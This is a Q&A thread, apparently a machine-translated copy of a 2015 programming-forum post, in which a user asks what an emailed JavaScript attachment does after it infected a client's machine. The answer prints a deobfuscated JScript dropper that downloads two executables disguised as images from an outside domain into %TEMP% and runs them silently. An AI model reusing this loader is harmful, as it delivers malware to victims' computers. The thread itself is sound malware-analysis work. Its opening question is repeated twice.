如果有人知道這個Java腳本文件中發生了什麼,你能告訴我嗎?我們的一位客戶將此作爲電子郵件發送給她,現在她無法打開任何文檔或電子表格。也看起來像傳播到網絡的其餘部分。需要幫助搞清楚Js的功能
如果有人能幫助我理解它,我將非常感激。
我刪除了它,而不是我想要其他人獲得的東西。
我可能不需要告訴任何人,但請不要打開它,除非它在沙箱。我不負責,如果你磚你的電腦。
來源:PM我要的文件,而..
如果有人知道這個Java腳本文件中發生了什麼,你能告訴我嗎?我們的一位客戶將此作爲電子郵件發送給她,現在她無法打開任何文檔或電子表格。也看起來像傳播到網絡的其餘部分。需要幫助搞清楚Js的功能
如果有人能幫助我理解它,我將非常感激。
我刪除了它,而不是我想要其他人獲得的東西。
我可能不需要告訴任何人,但請不要打開它,除非它在沙箱。我不負責,如果你磚你的電腦。
來源:PM我要的文件,而..
基本上,這是一個下載病毒的臨時文件夾並執行它...
你應該運行整個網絡上的病毒掃描。
var AxProxy = function() {};
(function() {
function fFh(fr, Klw, rn) {
var VeZ = new AxProxy('WScript.Shell');
var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
var OG4 = new AxProxy('MSXML2.XMLHTTP');
OG4['onReadyStateChange'] = function() {
if (OG4['readyState'] === 4) {
var g38 = new AxProxy('ADODB.Stream');
g38['open']();
g38['type'] = 1;
g38['write'](OG4['ResponseBody']);
g38['position'] = 0;
g38['saveToFile'](Klw, 2);
g38['close']();
}
};
try {
OG4['open']('GET', fr, false);
OG4['send']();
if (rn > 0) {
VeZ['Run'](Klw, 0, 0);
}
} catch (er) {};
}
fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();
所有其他變量只是意圖混淆和阻礙解碼。
PS:我代理ActiveXObject
所以這不能運行...
時代如果我有足夠的代表upvote,我會的。謝謝你兄弟,你真的幫助我這個。那是我正在尋找的精確。 – 2015-03-13 09:07:05
沒有probs男人:)我認爲你仍然可以接受(與複選標記圖標)。希望你修復你的電腦:) – epoch 2015-03-13 09:11:12
哈哈。是的,它的gona需要一段時間:P但乾草!至少現在我知道我在找什麼。感謝比勒陀利亞男傑! #Capetownproblems – 2015-03-13 09:16:52
它使用'WScript.Shell'做一些事情,不知道的是,虐待看看它 – epoch 2015-03-13 07:59:24
在鏈接那種態度,對於你認爲是病毒的,是不小心的。我希望大多數人在點擊前閱讀,並且他們不允許activeX內容明顯從未知域運行。 – Mackan 2015-03-13 07:59:26
我不明白爲什麼這是得到這麼多downvotes,只要你有知識,這是一個有趣的事情來解決,因爲它可能不是問這裏最好的問題... – epoch 2015-03-13 08:24:40